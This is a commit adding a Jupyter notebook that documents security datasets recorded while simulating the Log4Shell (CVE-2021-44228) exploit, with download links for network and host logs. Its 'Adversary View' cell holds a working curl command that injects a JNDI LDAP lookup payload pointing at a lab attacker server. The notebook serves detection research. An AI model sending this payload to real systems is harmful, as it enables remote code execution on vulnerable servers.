khulnasoft commited on
Commit
cc7f33b
1 Parent(s): d7c8a21

Create docs/notebooks/compound/Log4Shell.ipynb

Browse files
docs/notebooks/compound/Log4Shell.ipynb ADDED
@@ -0,0 +1,126 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "cells": [
3
+ {
4
+ "cell_type": "markdown",
5
+ "id": "d3b07fa6",
6
+ "metadata": {},
7
+ "source": [
8
+ "# Log4Shell"
9
+ ]
10
+ },
11
+ {
12
+ "cell_type": "markdown",
13
+ "id": "684f8133",
14
+ "metadata": {},
15
+ "source": [
16
+ "## Metadata"
17
+ ]
18
+ },
19
+ {
20
+ "cell_type": "markdown",
21
+ "id": "d212eae4",
22
+ "metadata": {},
23
+ "source": [
24
+ "\n",
25
+ "| | |\n",
26
+ "|:------------------|:---|\n",
27
+ "| Contributors | Roberto Rodriguez @Cyb3rWard0g |\n",
28
+ "| Creation Date | 2021/12/11 |\n",
29
+ "| Modification Date | 2022/05/13 |\n",
30
+ "| Tactics | [TA0001](https://attack.mitre.org/tactics/TA0001),[TA0002](https://attack.mitre.org/tactics/TA0002) |\n",
31
+ "| Techniques | [T1190](https://attack.mitre.org/techniques/T1190),[T1203](https://attack.mitre.org/techniques/T1203) |\n",
32
+ "| Tags | None |"
33
+ ]
34
+ },
35
+ {
36
+ "cell_type": "markdown",
37
+ "id": "11b5052c",
38
+ "metadata": {},
39
+ "source": [
40
+ "## Dataset Description\n",
41
+ "Datasets created while simulating a threat actor exploiting [CVE 2021-44228](https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44228) via a JNDI Reference Java Object.\n",
42
+ "In Log4j <= 2.14, `Message Lookups` were enabled by default creating an input validation vulnerability.\n",
43
+ "A threat actor could take advantage of this vulnerability to make a Java application process JNDI lookups to download and execute Java objects from an attacker controlled naming service.\n",
44
+ "There are a few types of Java objects that can be stored in a directory service.\n",
45
+ "A JNDI reference object is one of them. A JNDI reference jave object points to the location of the Java object requested. \n"
46
+ ]
47
+ },
48
+ {
49
+ "cell_type": "markdown",
50
+ "id": "95bdd0d7",
51
+ "metadata": {},
52
+ "source": [
53
+ "## Datasets Downloads"
54
+ ]
55
+ },
56
+ {
57
+ "cell_type": "markdown",
58
+ "id": "ff0fa2ad",
59
+ "metadata": {},
60
+ "source": [
61
+ "\n",
62
+ "| Type | Link |\n",
63
+ "|:-------------|:-------|\n",
64
+ "| Network | [https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/compound/Log4Shell/pcap_log4shell_cve2021_44228_jndi_reference.zip](https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/compound/Log4Shell/pcap_log4shell_cve2021_44228_jndi_reference.zip) |\n",
65
+ "| Network | [https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/compound/Log4Shell/pcap_log4shell_cve2021_44228_java_serialized.zip](https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/compound/Log4Shell/pcap_log4shell_cve2021_44228_java_serialized.zip) |\n",
66
+ "| Host | [https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/compound/Log4Shell/securityauditing_log4shell_cve2021_44228_java_serialized_object.zip](https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/compound/Log4Shell/securityauditing_log4shell_cve2021_44228_java_serialized_object.zip) |\n",
67
+ "| Host | [https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/compound/log4shell/sysmon_log4shell_cve2021_44228_java_serialized_object.zip](https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/compound/log4shell/sysmon_log4shell_cve2021_44228_java_serialized_object.zip) |\n",
68
+ "| Network | [https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/compound/log4shell/vminsights_vmconnection_log4shell_cve2021_44228_jndi_reference.zip](https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/compound/log4shell/vminsights_vmconnection_log4shell_cve2021_44228_jndi_reference.zip) |\n",
69
+ "| Host | [https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/compound/log4shell/syslog_auoms_auditd_log4shell_cve2021_44228_jndi_reference.zip](https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/compound/log4shell/syslog_auoms_auditd_log4shell_cve2021_44228_jndi_reference.zip) |\n",
70
+ "| Host | [https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/compound/log4shell/syslog_sysmon_log4shell_cve2021_44228_jndi_reference.zip](https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/compound/log4shell/syslog_sysmon_log4shell_cve2021_44228_jndi_reference.zip) |"
71
+ ]
72
+ },
73
+ {
74
+ "cell_type": "markdown",
75
+ "id": "1992d236",
76
+ "metadata": {},
77
+ "source": [
78
+ "## Simulation Metadata"
79
+ ]
80
+ },
81
+ {
82
+ "cell_type": "markdown",
83
+ "id": "ddcac4c3",
84
+ "metadata": {},
85
+ "source": [
86
+ "### Tools"
87
+ ]
88
+ },
89
+ {
90
+ "cell_type": "markdown",
91
+ "id": "7430ef31",
92
+ "metadata": {},
93
+ "source": [
94
+ "\n",
95
+ "| type | Name | Module |\n",
96
+ "|:-----|:-----|--------|\n",
97
+ "| Manual | sh | [sh](https://github.com/Cyb3rWard0g/log4jshell-lab/blob/main/research-notes/2021-12-11_01-CVE-2021-44228-simulation.md) |"
98
+ ]
99
+ },
100
+ {
101
+ "cell_type": "markdown",
102
+ "id": "109725eb",
103
+ "metadata": {},
104
+ "source": [
105
+ "## Adversary View\n",
106
+ "```\n",
107
+ "curl -X GET -H 'user-agent: ${jndi:ldap://192.168.2.6:1389/o=reference}' 192.168.2.5:8080/Log4j-2.14.0-SNAPSHOT/api\n",
108
+ "```"
109
+ ]
110
+ },
111
+ {
112
+ "cell_type": "markdown",
113
+ "id": "cb00e275",
114
+ "metadata": {},
115
+ "source": [
116
+ "## References\n",
117
+ "* [https://isc.sans.edu/diary/RCE+in+log4j%2C+Log4Shell%2C+or+how+things+can+get+bad+quickly/28120](https://isc.sans.edu/diary/RCE+in+log4j%2C+Log4Shell%2C+or+how+things+can+get+bad+quickly/28120) \n",
118
+ "* [https://github.com/OTRF/Microsoft-Sentinel2Go/tree/master/grocery-list/Linux/demos/CVE-2021-44228-Log4Shell](https://github.com/OTRF/Microsoft-Sentinel2Go/tree/master/grocery-list/Linux/demos/CVE-2021-44228-Log4Shell) \n",
119
+ "* [https://github.com/Cyb3rWard0g/log4jshell-lab](https://github.com/Cyb3rWard0g/log4jshell-lab) "
120
+ ]
121
+ }
122
+ ],
123
+ "metadata": {},
124
+ "nbformat": 4,
125
+ "nbformat_minor": 5
126
+ }